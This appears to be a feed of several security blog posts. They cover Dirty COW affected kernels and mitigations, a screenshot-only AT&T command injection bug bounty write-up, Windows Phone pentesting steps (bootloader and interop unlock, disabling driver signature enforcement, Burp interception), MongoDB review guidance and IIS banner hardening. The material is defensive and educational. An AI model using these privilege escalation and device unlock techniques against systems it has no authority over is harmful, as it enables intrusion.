  • Debian Linux wheezy, jessie, stretch and sid
  • Ubuntu Linux precise (LTS 12.04), trusty, xenial (LTS 16.04), yakkety and vivid/ubuntu-core
  • SUSE Linux Enterprise 11 and 12

Ubuntu and Debian kernel versions earlier than the patched versions below are vulnerable to Dirty COW:

  • 4.8.0-26.28 for Ubuntu 16.10
  • 4.4.0-45.66 for Ubuntu 16.04 LTS
  • 3.13.0-100.147 for Ubuntu 14.04 LTS
  • 3.2.0-113.155 for Ubuntu 12.04 LTS
  • 3.16.36-1+deb8u2 for Debian 8
  • 3.2.82-1 for Debian 7
  • 4.7.8-1 for Debian unstable

Technical Impact

  • An unprivileged local user could use this vulnerability to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

Proof of Concept

For the PoC we used the dirtycow exploit, which allows a normal user to write file content they are not authorised to modify.

[Screenshot: modifying data owned by root using normal privileges]

[Screenshot: downloading the Dirty COW exploit and compiling it as a low-privilege user]

How to Fix this Issue?

RedHat

Until the security patch is published, here is the temporary mitigation for Dirty Cow vulnerability in RedHat servers:

  •  Create a file “update.stp” and add these lines:

    probe kernel.function("mem_write").call ? {
            $count = 0
    }
    probe syscall.ptrace { // includes compat ptrace as well
            $request = 0xfff
    }
    probe begin {
            printk(0, "CVE-2016-5195 mitigation loaded")
    }
    probe end {
            printk(0, "CVE-2016-5195 mitigation unloaded")
    }

  • Install the “systemtap” package and its required dependencies.
  • Execute the command “stap -g update.stp” as root. A reboot removes this mitigation, so these steps must be repeated after every reboot.

Ubuntu and Debian servers

Update the OS with the latest security patch available from the OS repository. This can be done with the following command:

    sudo apt-get update && sudo apt-get dist-upgrade

OpenSUSE servers

Update the OS with the latest security patch available from the OS repository. This can be done with the following command:

    zypper patch

CloudLinux servers

For CloudLinux 7, run:

    yum clean all; yum install kernel-3.10.0-427.10.1.lve1.4.22.el7 kmod-lve-1.4-22.el7 --enablerepo=cloudlinux-updates-testing

For CloudLinux 6, run:

    yum clean all; yum install kernel-2.6.32-673.26.1.lve1.4.18.el6 kmod-lve-1.4-18.el6 --enablerepo=cloudlinux-updates-testing

AT&T Arbitrary Code Execution Vulnerability
https://www.avsecurity.in/att-arbitrary-code-execution-vulnerability/
Tue, 26 Jul 2016 14:33:43 +0000

Recently, I found an interesting Remote Code Execution issue in the AT&T bug bounty program.

But before going into this, let’s understand Arbitrary Code Execution.

Arbitrary Code Execution, also known as command injection, is a technique used via a web interface to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to have them executed. Any web interface whose input is not properly sanitised is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasised during the design and development of applications.

The issue was reported to the AT&T Security Team on October 21, 2014, and resolved by AT&T on Jan 27, 2015.

The issue I found was straightforward and needs no explanation :)

I was able to execute OS-level commands on the system; below are the step-by-step screenshots of the attack.

[Screenshot, step 1: affected page]

[Screenshot, step 2: captured request]

[Screenshot, step 3: highlighted vulnerable parameter]

[Screenshot, step 4: password parameter modified to execute code]

[Screenshot, step 5: code execution successful]

Response from AT&T Team

[Screenshot: response from the AT&T team]

Windows Mobile Application Security – Part II https://www.avsecurity.in/windows-mobile-application-security-part-ii/ https://www.avsecurity.in/windows-mobile-application-security-part-ii/#comments Thu, 12 May 2016 17:43:29 +0000 http://www.avsecurity.in/?p=265 The next step is accessing the application’s internal storage.

Accessing Internal Storage of Application using Registry Editor Application

Windows Phone does not allow access to the internal storage of its applications even with “mass storage” mode enabled.

Failed To Access Internal Storage of Application on Windows

To get access to internal storage we need to perform an “Interop Unlock”.
Various procedures for Interop Unlock are described on the “xda-developers” forum.
I have used a simple technique that allows Interop Unlock on a Windows Lumia 920 without an SD card.

Below are the steps for the same (SD Card is not required):

    • Deploy the application “vcREG_1_2_BOOTSTRAP.xap” using the Application Deployment Tool found at “C:\Program Files (x86)\Microsoft SDKs\Windows Phone\v8.1\Tools\AppDeploy”
      Deploy Application vcRegBootstrap
    • Go to the “settings” menu on the Windows device, scroll down and select the highlighted application as shown in the screenshot below. It will launch Lumia Registry Editor; now go to the “template” menu in it

Launch VReg on Windows Phone

Go to Templates Setting on Windows Phone

Check Box Interop Unlock

    • Now reconnect the device with USB
    • Now you can access the internal storage of the applications, which is mounted on your system.
      Internal Applications Storage Location: Phone\Data\PROGRAMS\{GUID}

Internal Storage Access of Application

Performing Static Analysis of XAP File

XAP is the file format used to distribute and install application software and middleware onto Microsoft’s Windows Phone 7/8/8.1/10 operating systems.
(Note: a XAP can be installed on the mobile device with the help of the Application Deployment tool provided by Microsoft.)
STATIC ANALYSIS IF THE XAP FILE IS PROVIDED

  1. Extracting a XAP file is similar to the APK extraction method.
  2. Rename the XAP extension to Zip and extract the file

Extracting XAP File (screenshots 1-3)

Static Analysis of the Store Application

The Microsoft Store does not provide the XAP file for download, so its content cannot be checked directly.
We need to perform the activities below to extract the internal content of the application:

    1. Install the application from the Microsoft Store and traverse to the location
      “Phone\Data\PROGRAMS\{GUID}”
      Note: GUID is the application identifier.
    2. Now we can see the application files, including the DLL file.

Accessing Internal Storage of Application to Extract XAP Content


DE-COMPILE DLL File

Most XAP files contain a DLL file and other resources.
The DLL file can be decompiled using various available tools.
I have used the ILSpy_Master portable tool for decompiling the DLL file.

DLL reverse engineering


WMAppManifest: Verify the Application Permissions

In Windows Phone, capabilities notify the end user of the security- or privacy-critical functionality required by the application.
Capabilities are also used to provision the security of the least privilege chamber (LPC) and reduce the attack surface by only provisioning ACLs for what the application requires.
Capabilities are configured based on the application’s requirements, and they must be reviewed against those requirements.
Applications should only be assigned the capabilities they require to perform their functionality, and any unused capabilities should be removed.

Note: You must mark the appropriate capabilities in the manifest so that the user is correctly notified of the functionality that your app uses. If you don’t mark the correct capabilities, your app may exit unexpectedly when it is being installed on a user’s phone.

Capabilities
https://msdn.microsoft.com/en-us/library/windows/apps/jj206936(v=vs.105).aspx

Review Capabilities
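The XAP extraction steps and the capability review above can be scripted. The following Python is an added example (not code from the post or from Microsoft): because a XAP is a zip, it reads WMAppManifest.xml straight out of the package and diffs the declared ID_CAP_* capabilities against the set a reviewer expects the app to need. The XAP and its manifest are constructed in memory; the product ID and app title are made up, while the element names and capability identifiers follow the Windows Phone 8 manifest schema.

```python
"""Added example (not from the original post): open a XAP as a zip, read
WMAppManifest.xml and compare declared capabilities with the expected set."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed manifest: element names and ID_CAP_* values follow the WP8
# manifest schema; the product ID and title are made up for this demo.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<Deployment xmlns="http://schemas.microsoft.com/windowsphone/2012/deployment" AppPlatformVersion="8.0">
  <App ProductID="{11111111-2222-3333-4444-555555555555}" Title="DemoApp" Version="1.0.0.0">
    <Capabilities>
      <Capability Name="ID_CAP_NETWORKING" />
      <Capability Name="ID_CAP_LOCATION" />
      <Capability Name="ID_CAP_CONTACTS" />
      <Capability Name="ID_CAP_IDENTITY_DEVICE" />
    </Capabilities>
  </App>
</Deployment>
"""

def build_sample_xap() -> bytes:
    """Constructed XAP: a zip holding the manifest and a dummy DLL entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WMAppManifest.xml", SAMPLE_MANIFEST)
        z.writestr("DemoApp.dll", b"MZ dummy")
    return buf.getvalue()

def list_capabilities(xap_bytes: bytes) -> list:
    """Steps 1-2 of the post in code: treat the XAP as a zip, pull the
    manifest, and collect every <Capability Name="..."/> in document order."""
    with zipfile.ZipFile(io.BytesIO(xap_bytes)) as z:
        root = ET.fromstring(z.read("WMAppManifest.xml"))
    caps = []
    for el in root.iter():
        # Strip the namespace so WP7 (no xmlns) and WP8 manifests both match.
        if el.tag.rsplit("}", 1)[-1] == "Capability" and el.get("Name"):
            caps.append(el.get("Name"))
    return caps

def review_capabilities(declared, expected):
    """Return (unexpected, missing): capabilities to question in the review,
    and required ones whose absence may make the app exit on install."""
    d, e = set(declared), set(expected)
    return sorted(d - e), sorted(e - d)

if __name__ == "__main__":
    caps = list_capabilities(build_sample_xap())
    print(caps)
    print(review_capabilities(caps, ["ID_CAP_NETWORKING", "ID_CAP_LOCATION"]))
```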

Performing Dynamic Analysis of Windows Application

PERFORMING DYNAMIC ANALYSIS ON LOCAL STORAGE
By default, Windows Phone creates a temp location where the application stores runtime information.

The Windows application stores data at runtime in the following location:
“Windows Phone\Phone\Data\Users\DefApps\APPDATA”

In this location we may find critical information like databases (SDF) or temporary files.
Dynamic Analysis of File Storage

INTERCEPTING TRAFFIC USING BURPSUITE

To intercept the HTTPS traffic of a Windows Phone via Burp Suite, we need to import the Burp certificate:

  1. Export the Burp certificate on your operating system and then email it to the Windows Phone device
  2. Download the certificate on the mobile device as shown in the screenshot below
  3. It will ask to install the certificate; click Install.
  4. Once done, configure the Burp proxy and you are good to go 🙂
  5. Now you can intercept HTTPS traffic from your Windows mobile device.

Window-Burp-HTTP-Proxy (screenshots 1-6)

Windows Mobile Application Security – Part I https://www.avsecurity.in/windows-mobile-application-security-part-i/ https://www.avsecurity.in/windows-mobile-application-security-part-i/#respond Sun, 20 Mar 2016 05:54:31 +0000 http://www.avsecurity.in/?p=199 We need access to the internal storage of the device to proceed with security testing; however, Windows devices don’t allow users access to their internal storage. Naturally, to access internal storage we need an unlocked Windows device. In this article, we will learn to unlock the bootloader of a Windows Nokia Lumia device, followed by gaining root access to internal storage.

Unlocking Windows Mobile Device (Lumia)

Below are the prerequisites:

  1. Windows Lumia phone device
  2. Windows Phone Recovery Tool (Download URL)
  3. Qualcomm Emergency Download drivers (Download URL)
  4. Windows Phone Internals
  5. FFU image for your Lumia mobile device, downloaded from http://www.lumiafirmware.com/

(Note: Before you start please make sure you download all above prerequisite.)

Unlocking devices with Windows Phone Internals is only possible for the devices and firmware versions listed below.
Currently these models are supported for unlocking the bootloader:
Supported Lumia devices (screenshot)

These OS versions are currently supported for enabling root access:
Supported firmware versions (screenshot)

HeathCliff has released a tool called “Windows Phone Internals” that allows Windows phone owners to unlock their smartphone’s bootloaders, gain root access, and even create and run custom ROMs.

Below are the steps that have to be performed to unlock the Windows device. For this tutorial, we’ll be using a Windows Lumia 920 device.

Step 1: Installing Lumia Driver

This is a mandatory step which allows the user to download the Windows firmware specific to your Windows mobile phone device. Install the Windows Phone Recovery Tool from the Microsoft site. Download Link

Lumia 920 Not Detected

Installing the Qualcomm Emergency Download driver is optional, but I would recommend performing this step as my mobile phone was not detected by the Windows Phone Recovery Tool.

Installing Qualcomm Emergency Download drivers
Extract and place the Qualcomm folder on your desktop.
Tricky part: installing the certificate file to download the Qualcomm driver. Windows 10 does not allow users to install a third-party driver certificate in the “Trusted Root Certification Authorities” category.
To disable certificate driver signature verification, please follow the steps below:

  • Run Command Prompt as Administrator and enter the command below
     shutdown /r /o /t 0
  • Then go to the Troubleshoot > Startup Settings option

Microsoft Choose Option

Microsoft Advanced Option

  • You will be given a list of startup settings, which includes “Disable driver signature enforcement” as shown in the screenshot below.

List of startup settings

To choose the setting, you need to press the F7 key.

  • The system will restart; now you can install the third-party certificate in the “Trusted Root Certification Authorities” category
  • Disable Driver Signature Enforcement Permanently and Completely

     bcdedit /set testsigning on

  • Now install the third-party driver certificate in the “Trusted Root Certification Authorities” category
  • To install the certificate, click the certificate file located at <path>
Extract Qualcomm Driver To Desktop and Select Certificate File

Certificate Install Step 1

Certificate Install Step 2

Certificate Install Step 3

Certificate Install Step 4

After the certificate installation is complete, proceed with installing the Qualcomm Emergency drivers.

Follow the steps below:

  • Open Command Prompt and go to the directory where the Qualcomm Emergency driver’s folder is located

     cd C:\Users\ ..\Desktop\Qualcomm CDMA Technologies MSM\Drivers

  • Then type the commands below, which will install the Qualcomm Emergency drivers

PnPUtil -i -a msmdm.inf
PnPUtil -i -a qcmdm.inf
PnPUtil -i -a qcser.inf

  • Reboot your PC

Next, verify that your Windows Phone device is detected by the Windows Phone Recovery Tool. If it is, you can proceed as below.

Step 2: Flash Windows Phone device with Original FFU

  • Open “Windows Phone Internals”
  • Go to Flash → “Flash original FFU”
  • Select the FFU downloaded from http://www.lumiafirmware.com/ for your device. To find out the exact FFU image, check the “info” section in Windows Phone Internals.
  • For my device it’s “RM-821 VAR IMEA INDIA CV BLACK”

Original FFU download Lumia

Flash using Original FFU

  • Click Continue and the phone will restart after some time

Step 3: Download firmware for your mobile device using the Windows Phone Recovery Tool

  • Connect your Windows Phone device using USB
  • The Windows Phone Recovery Tool will detect your phone
  • Click the Install Firmware button; it will download the latest firmware available for your Windows Phone

Download Latest FFU using Windows Phone Recovery Tool

The downloaded FFU image and all the files can be found at the location below:
“C:\ProgramData\Microsoft\Packages\Products\RM-821”

Step 4: Generating the HEX file which allows the Windows Phone to go into Windows emergency mode

  • Extract gpt0.bin from the FFU image

cd C:\Program Files (x86)\Microsoft Care Suite\Windows Device Recovery Tool

thor2 -mode ffureader -ffufile "C:\ProgramData\Microsoft\Packages\Products\RM-821\XXX.ffu" -dump_gpt -filedir G:\MobilePentest\LUMIA920

Destination Folder: “G:\MobilePentest\LUMIA920”

The output will be an “Exited with Success” message as shown in the screenshot below

Thor Tool

Destination Folder of GPT0

  • The above command will create gpt0.bin; rename it as msimage.mbn

    Rename GPT0 file to msimage

  • Generating the HEX file for the binary file using bin2hex (Download bin2hex). Download the bin2hex file and place it in the “G:\MobilePentest\LUMIA920” directory, then run:

cd G:\MobilePentest\LUMIA920
bin2hex gpt1.bin

bin2hex

Step 5: Final Step: Unlock Boot Loader Setting using Windows Phone Recovery Tool

(Make sure the Windows device is connected via USB)

  • Go to Unlock Boot Loader
  • Windows Phone Internals will ask the user to “switch to flash-mode”; click “OK” and the phone will reboot into flash mode

Unlock Boot Loader (screenshots 1-2)

  • The “Resource for Flashing” screen will appear once the device enters flash mode
  • Select the FFU image which was downloaded to “C:\ProgramData\Microsoft\Packages\Products\RM-821”
  • Select the Emergency folder located at “G:\MobilePentest\LUMIA920”
  • Select the SBL3 file for your phone device (SBL3 Download)

Unlock Boot Loader (screenshots 3-7)

  • Click Continue; this will unlock your Windows Phone device.

Accessing Internal Storage using Windows Phone Internals

  • Launch Windows Phone Internals with the Windows Phone device connected
  • Go to Root Access → “Enable Root Access Directly on Phone”
  • Click “Unlock Phone”

Enable Root Access

Enable Root Access 2

Enable Root Access 3

  • This will mount the internal storage on your OS

Internal Storage access with Root

Voila!! We have access to the internal storage of the device with root privileges.

Stay tuned for Windows Mobile Application Security part II 🙂

MongoDB Security Review Document https://www.avsecurity.in/mongodb-security-review-document/ https://www.avsecurity.in/mongodb-security-review-document/#respond Mon, 17 Aug 2015 08:22:41 +0000 http://www.avsecurity.in/?p=48 We are happy to announce Security Review guidelines for MongoDB. CIS guidelines are not available for MongoDB, and we thought this might be helpful for you.

Content has been referenced from the MongoDB original website.

I have created a sample command which will help you extract the exact details required for performing a security review, along with the recommended settings suggested by MongoDB.
Please note that this document will only highlight the points related to MongoDB, not the underlying OS security.

Intended Audience
This benchmark is intended for security specialists and auditors who are planning to review the security of a MongoDB server. Please find the link attached below.

Download URL
MongoDB_Security_Review_v1.0

Please let me know if there is any feedback/improvement in the comment section below.

Disable IIS 8.0/8.5 Banner Information https://www.avsecurity.in/disable-iis-8-08-5-banner-information/ https://www.avsecurity.in/disable-iis-8-08-5-banner-information/#respond Wed, 29 Jul 2015 06:37:04 +0000 http://www.avsecurity.in/?p=112 Below are the steps to fix the banner (version information) in IIS 8.0/8.5.

Step 1:
Install the latest version of the Microsoft Web Platform Installer (https://www.microsoft.com/web/downloads/platform.aspx/).
Step 2:
Install URL Rewrite 2.0 using the Web Platform Installer on the server.

Install URL Rewrite using Web Platform Installer

Successfully Installed
Step 3:
After installation, URL Rewrite appears in IIS Manager.


Step 4:
Add an Outbound Rule using URL Rewrite to replace the response banner with a custom banner.

Change URL Rewrite

Step 5:
Alternatively, we can add the code shown below to the web.config file.

Add OutBound Rule

Web Config Change

Thanks to my friend:
Pralhad Chaskar(c0d3xpl0it)‏
http://c0d3xpl0it.blogspot.ae/
